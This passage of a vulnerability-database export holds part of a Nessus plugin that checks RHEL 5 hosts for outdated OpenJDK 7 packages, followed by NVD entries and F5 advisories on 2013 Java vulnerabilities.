);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5838.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5840.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5842.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5849.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5850.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5851.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-1447.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1447\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "70536", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc"]}

{"result": {"cve": [{"id": "CVE-2013-5782", "type": "cve", "title": "CVE-2013-5782", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.", "published": "2013-10-16T11:55:34", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782", "cvelist": ["CVE-2013-5782"], "lastseen": "2018-01-05T12:21:25"}, {"id": "CVE-2013-4002", "type": "cve", "title": "CVE-2013-4002", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 allows remote attackers to affect availability via unknown vectors.", "published": "2013-07-23T07:03:19", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4002", "cvelist": ["CVE-2013-4002"], "lastseen": "2018-01-05T12:21:22"}, {"id": "CVE-2013-5850", "type": "cve", "title": "CVE-2013-5850", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5842.", "published": "2013-10-16T13:55:06", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850", "cvelist": ["CVE-2013-5850"], "lastseen": "2018-01-05T12:21:26"}, {"id": "CVE-2013-5778", "type": "cve", "title": "CVE-2013-5778", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and earlier, 5.0u51 and earlier, and Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to 2D.", "published": "2013-10-16T11:55:34", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5778", "cvelist": ["CVE-2013-5778"], "lastseen": "2018-01-05T12:21:25"}, {"id": "CVE-2013-5842", "type": "cve", "title": "CVE-2013-5842", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5850.", "published": "2013-10-16T13:55:06", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842", "cvelist": ["CVE-2013-5842"], "lastseen": "2018-01-05T12:21:26"}, {"id": "CVE-2013-5830", "type": "cve", "title": "CVE-2013-5830", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.", "published": "2013-10-16T13:55:05", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830", "cvelist": ["CVE-2013-5830"], "lastseen": "2018-01-05T12:21:26"}, {"id": "CVE-2013-5784", "type": "cve", "title": "CVE-2013-5784", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect integrity via vectors related to SCRIPTING.", "published": "2013-10-16T11:55:34", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5784", "cvelist": ["CVE-2013-5784"], "lastseen": "2018-01-05T12:21:25"}, {"id": "CVE-2013-5809", "type": "cve", "title": "CVE-2013-5809", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-5829.", "published": "2013-10-16T13:55:05", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809", "cvelist": ["CVE-2013-5809"], "lastseen": "2018-01-05T12:21:26"}, {"id": "CVE-2013-5802", "type": "cve", "title": "CVE-2013-5802", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JAXP.", "published": "2013-10-16T13:55:05", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802", "cvelist": ["CVE-2013-5802"], "lastseen": "2018-01-05T12:21:26"}, {"id": "CVE-2013-5851", "type": "cve", "title": "CVE-2013-5851", "description": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via vectors related to JAXP.", "published": "2013-10-16T14:55:03", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5851", "cvelist": ["CVE-2013-5851"], "lastseen": "2017-09-19T13:38:55"}], "f5": [{"id": "F5:K14340611", "type": "f5", "title": "Java vulnerability CVE-2013-5782", "description": "\nF5 Product Development has assigned ID 562118 (Enterprise Manager) and ID 552323 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Java \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| Java \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.4.0| 4.5.0| High| Java \nBIG-IQ Device| 4.2.0 - 4.4.0| 4.5.0| High| Java \nBIG-IQ Security| 4.0.0 - 4.4.0| 4.5.0| High| Java \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "published": "2016-05-24T01:25:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K14340611", "cvelist": ["CVE-2013-5782"], "lastseen": "2017-06-08T00:16:38"}, {"id": "SOL14340611", "type": "f5", "title": "SOL14340611 - Java vulnerability CVE-2013-5782", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL12766: ARX hotfix matrix\n", "published": "2016-05-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/k/14/sol14340611.html", "cvelist": ["CVE-2013-5782"], "lastseen": "2016-09-26T17:23:29"}, {"id": "F5:K16872", "type": "f5", "title": "Java Runtime Environment vulnerability CVE-2013-4002", "description": "\nF5 Product Development has assigned ID 481806 (BIG-IP), ID 481806-1 (BIG-IQ), and ID 530276-1 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| Xerces \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Low| Xerces \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Low| Xerces \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Low| Xerces \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| Xerces \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| Xerces \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| Xerces \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| Xerces \nBIG-IQ ADC| 4.5.0| None| Low| Xerces \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n", "published": "2015-07-08T05:10:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K16872", "cvelist": ["CVE-2013-4002"], "lastseen": "2017-06-08T00:16:05"}, {"id": "SOL16872", "type": "f5", "title": "SOL16872 - Java Runtime Environment vulnerability CVE-2013-4002", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "published": "2015-07-07T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16872.html", "cvelist": ["CVE-2013-4002"], "lastseen": "2016-07-25T17:02:11"}, {"id": "F5:K95313044", "type": "f5", "title": "Multiple Java vulnerabilities", "description": "\nF5 Product Development has assigned ID 552323 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| \nNone| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Management GUI Java \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "published": "2016-05-25T01:58:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K95313044", "cvelist": ["CVE-2013-5848", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5776", "CVE-2013-5842", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5852", "CVE-2013-5789", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": 